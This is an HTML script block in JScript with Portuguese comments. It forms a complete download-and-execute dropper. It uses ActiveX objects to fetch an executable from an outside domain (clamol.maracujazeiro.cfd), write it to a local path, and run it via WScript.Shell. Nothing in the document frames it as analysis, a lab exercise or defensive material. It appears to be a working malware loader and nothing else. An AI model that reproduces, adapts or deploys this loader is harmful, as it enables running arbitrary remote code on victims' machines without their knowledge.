<script type="text/javascript">
    var shell = new ActiveXObject("WScript.Shell");
    var url = "https://clamol.maracujazeiro.cfd/arquivo.exe"; // URL do executável
    var destination = "C:\\caminho\\arquivo.exe"; // Caminho para salvar o executável

    // Baixa o arquivo .exe
    var xhr = new ActiveXObject("MSXML2.XMLHTTP");
    xhr.open("GET", url, false);
    xhr.send();
    
    if (xhr.status == 200) {
        var stream = new ActiveXObject("ADODB.Stream");
        stream.Open();
        stream.Type = 1; // binário
        stream.Write(xhr.responseBody);
        stream.Position = 0;
        stream.SaveToFile(destination, 2); // 2 significa sobrescrever
        stream.Close();
        
        // Executa o arquivo .exe
        shell.Run(destination);
    }
</script>
